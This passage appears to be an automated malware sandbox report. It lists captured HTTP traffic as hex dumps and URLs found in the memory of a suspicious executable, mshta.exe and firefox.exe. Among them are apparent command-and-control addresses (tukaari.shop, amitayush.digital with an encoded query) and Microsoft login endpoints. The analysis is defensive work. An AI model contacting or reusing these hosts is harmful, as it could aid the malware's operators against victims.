          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 12 Nov 2024 17:36:14 GMTContent-Type: text/htmlContent-Length: 52139Connection: closeETag: "672f77fe-cbab"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 61 74 6f 6d 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 74 6f 6d 2e 63 6f 6d 20 2d 20 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 65 64 20 61 20 62 72 61 6e 64 61 62 6c 65 20 64 6f 6d 61 69 6e 20 66 6f 72 20 79 6f 75 72 20 62 75 73 69 6e 65 73 73 3f 20 43 68 6f 6f 73 65 20 66 72 6f 6d 20 32 30 30 2c 30 30 30 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 20 69 6e 20 6f 75 72 20 62 72 61 6e 64 61 62 6c 65 20 64 6f 6d 61 69 6e 20 6d 61 72 6b 65 74 70 6c 61 63 65 20 63 75 72 61 74 65 64 20 62 79 20 6e 61 6d 69 6e 67 20 65 78 70 65 72 74 73 2e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 70 72 65 6d 69 75 6d 2d 64 6f 6d 61 69 6e 73 2d 66 6f 72 2d 73 61 6c 65 2f 61 6c 6c 3f 67 61 64 5f 73 6f 75 72 63 65 3d 31 26 67 62 72 61 69 64 3d 30 41 41 41 41 41 39 55 36 58 70 35 48 6d 43 44 68 6c 46 73 59 2d 56 7a 69 38 36 6f 63 37 49 52 58 78 26 67 63 6c 69 64 3d 45 41 49 61 49 51 6f 62 43 68 4d 49 31 74 4c 66 6c 34 58 4f 69 51 4d 56 62 4b 70 4c 42 52 31 79 44 77 41 6b 45 41 41 59 41 79 41 41 45 67 4b 56 35 66 44 5f 42 77 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 74 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 67 73 2f 64 6f 6d 61 69 6e 77 61 6c 6c 2e 6a 70 67 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 4d 61 72 6b 65 74 70 6c 61 63 65 20 2d 20 42 75 79 20 61 6e 64 20 53 65 6c 6c 20 44 6f 6d 61 69 6e 73 20 2d 20 41 74 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 12 Nov 2024 17:36:17 GMTContent-Type: text/htmlContent-Length: 52139Connection: closeETag: "672f77ff-cbab"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 20 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 70 6e 67 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 61 67 65 73 2f 61 74 6f 6d 2d 66 61 76 69 63 6f 6e 2e 70 6e 67 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 41 74 6f 6d 2e 63 6f 6d 20 2d 20 34 30 34 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 4e 65 65 64 20 61 20 62 72 61 6e 64 61 62 6c 65 20 64 6f 6d 61 69 6e 20 66 6f 72 20 79 6f 75 72 20 62 75 73 69 6e 65 73 73 3f 20 43 68 6f 6f 73 65 20 66 72 6f 6d 20 32 30 30 2c 30 30 30 20 64 6f 6d 61 69 6e 20 6e 61 6d 65 73 20 69 6e 20 6f 75 72 20 62 72 61 6e 64 61 62 6c 65 20 64 6f 6d 61 69 6e 20 6d 61 72 6b 65 74 70 6c 61 63 65 20 63 75 72 61 74 65 64 20 62 79 20 6e 61 6d 69 6e 67 20 65 78 70 65 72 74 73 2e 22 3e 0a 20 20 20 20 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 63 61 6e 6f 6e 69 63 61 6c 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 70 72 65 6d 69 75 6d 2d 64 6f 6d 61 69 6e 73 2d 66 6f 72 2d 73 61 6c 65 2f 61 6c 6c 3f 67 61 64 5f 73 6f 75 72 63 65 3d 31 26 67 62 72 61 69 64 3d 30 41 41 41 41 41 39 55 36 58 70 35 48 6d 43 44 68 6c 46 73 59 2d 56 7a 69 38 36 6f 63 37 49 52 58 78 26 67 63 6c 69 64 3d 45 41 49 61 49 51 6f 62 43 68 4d 49 31 74 4c 66 6c 34 58 4f 69 51 4d 56 62 4b 70 4c 42 52 31 79 44 77 41 6b 45 41 41 59 41 79 41 41 45 67 4b 56 35 66 44 5f 42 77 45 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 73 69 74 65 5f 6e 61 6d 65 22 20 63 6f 6e 74 65 6e 74 3d 22 41 74 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 61 74 6f 6d 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 69 6d 67 73 2f 64 6f 6d 61 69 6e 77 61 6c 6c 2e 6a 70 67 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 69 74 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 44 6f 6d 61 69 6e 20 4d 61 72 6b 65 74 70 6c 61 63 65 20 2d 20 42 75 79 20 61 6e 64 20 53 65 6c 6c 20 44 6f 6d 61 69 6e 73 20 2d 20 41 74 6f 6d 22 3e 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 74 79 70 65 22
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Tue, 12 Nov 2024 17:37:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 2088Connection: closeVary: Accept-EncodingStatus: 404 Not FoundX-Request-Id: 2978624a8f32ae2f31fda779228655a8X-Runtime: 0.027656Data Raw: 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 2d 20 53 74 72 69 6b 69 6e 67 6c 79 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 69 64 3d 22 76 69 65 77 70 6f 72 74 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4d 6f 6e 74 73 65 72 72 61 74 7c 4f 70 65 6e 2b 53 61 6e 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 2f 2f 61 73 73 65 74 73 2e 73 74 72 69 6b 69 6e 67 6c 79 2e 63 6f 6d 2f 61 73 73 65 74 73 2f 34 30 34 2d 73 74 79 6c 65 73 2e 63 73 73 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 20 20 20 20 3c 21 2d 2d 5b 69 66 20 6c 74 65 20 49 45 20 37 5d 3e 0a 20 20 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 2e 77 69 64 65 20 7b 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 36 30 70 78 3b 20 7d 0a 20 20 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 20 20 20 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 2f 2f 20 47 6f 6f 67 6c 65 20 41 6e 61 6c 79 74 69 63 73 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 69 2c 73 2c 6f 2c 67 2c 72 2c 61 2c 6d 29 7b 69 5b 27 47 6f 6f 67 6c 65 41 6e 61 6c 79 74 69 63 73 4f 62 6a 65 63 74 27 5d 3d 72 3b 69 5b 72 5d 3d 69 5b 72 5d 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 0a 20 20 20 20 20 20 28 69 5b 72 5d 2e 71 3d 69 5b 72 5d 2e 71 7c 7c 5b 5d 29 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 7d 2c 69 5b 72 5d 2e 6c 3d 31 2a 6e 65 77 20 44 61 74 65 28 29 3b 61 3d 73 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 6f 29 2c 0a 20 20 20 20 20 20 6d 3d 73 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 6f 29 5b 30 5d 3b 61 2e 61 73 79 6e 63 3d 31 3b 61 2e 73 72 63 3d 67 3b 6d 2e 70 61 72 65 6e 74 4e 6f 64 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 61 2c 6d 29 0a 20 20 20 20 20 20 7d 29 28 77 69 6e 64 6f 77 2c 64 6f 63 75 6d 65 6e 74 2c 27 73 63 72 69 70 74 27 2c 27 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2d 61 6e 61 6c 79 74 69 63 73 2e 63 6f 6d 2f 61 6e 61 6c 79 74 69 63 73 2e 6a 73 27 2c 27 67 61 27 29 3b 0a 0a 20 20 20 20 20 20 67 61 28 27 63 72 65 61 74 65 27 2c 20 27
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3917330030.00000000052F0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tukaari.shop
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3917330030.00000000052F0000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.tukaari.shop/h8b0/
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
          Source: mshta.exe, 00000003.00000002.3918825109.000000000817A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
          Source: mshta.exe, 00000003.00000002.3916202013.00000000041C4000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.1912289226.0000000005864000.00000004.80000000.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Montserrat
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIoaomQNQcsA88c7O9yZ4KMCoOg4Ko20yw.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIoaomQNQcsA88c7O9yZ4KMCoOg4Ko40yyygA.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIoaomQNQcsA88c7O9yZ4KMCoOg4Ko50yyygA.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIoaomQNQcsA88c7O9yZ4KMCoOg4Ko70yyygA.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIuaomQNQcsA88c7O9yZ4KMCoOg4Koz4y6qhA.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIuaomQNQcsA88c7O9yZ4KMCoOg4Koz4yCqhMva.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIuaomQNQcsA88c7O9yZ4KMCoOg4Koz4yGqhMva.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.gstatic.com/s/plusjakartasans/v8/LDIuaomQNQcsA88c7O9yZ4KMCoOg4Koz4yOqhMva.woff2)
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://helpdesk.atom.com/en/articles/389625-trademark-research-service7
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://helpdesk.atom.com/squadhelp-services/trademark-filing-package
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://iframe.mediadelivery.net/embed/239474/327efcdd-b1a2-4891-b274-974787ae8362?autoplay=false&am
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
          Source: mshta.exe, 00000003.00000003.1800765485.0000000008113000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_deskt&
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033LMEM
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033J
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
          Source: mshta.exe, 00000003.00000002.3902512217.0000000003048000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
          Source: mshta.exe, 00000003.00000002.3916202013.000000000562E000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.00000000046AE000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.amitayush.digital/5ab9/?mnYxMt=RKfYqv7dLSd52zuw9p6x496tTBAgi3kUigLPO7fV9fYs6caX5nN0t2Amz
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/assets/images/atom-favicon.png
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/assets/imgs/domainwall.jpg
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/auctions
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/audience-testing
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/blog/
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/blog/discover-atom/
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/brand-alignment
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/brand-identity-design
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/branding-marketing-naming-contests
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/branding-marketing-naming-contests/all
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/business-name-generator
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/connect
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/domain-appraisal
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/domain-name-generator
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/free-trademark-search
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/how-it-works
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/join-as-creative
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/logos
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/managed-contests
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/our-work
          Source: tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/length/3%20Letters
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/length/4%20Letters
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/length/5%20Letters
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/length/Short
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all/type_of_name/One%20Word
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/premium-domains-for-sale/all?gad_source=1&gbraid=0AAAAA9U6Xp5HmCDhlFsY-Vzi86oc7
          Source: mshta.exe, 00000003.00000002.3916202013.000000000530A000.00000004.10000000.00040000.00000000.sdmp, tIEQBQsFNUYr.exe, 00000005.00000002.3914218489.000000000438A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.atom.com/pricing
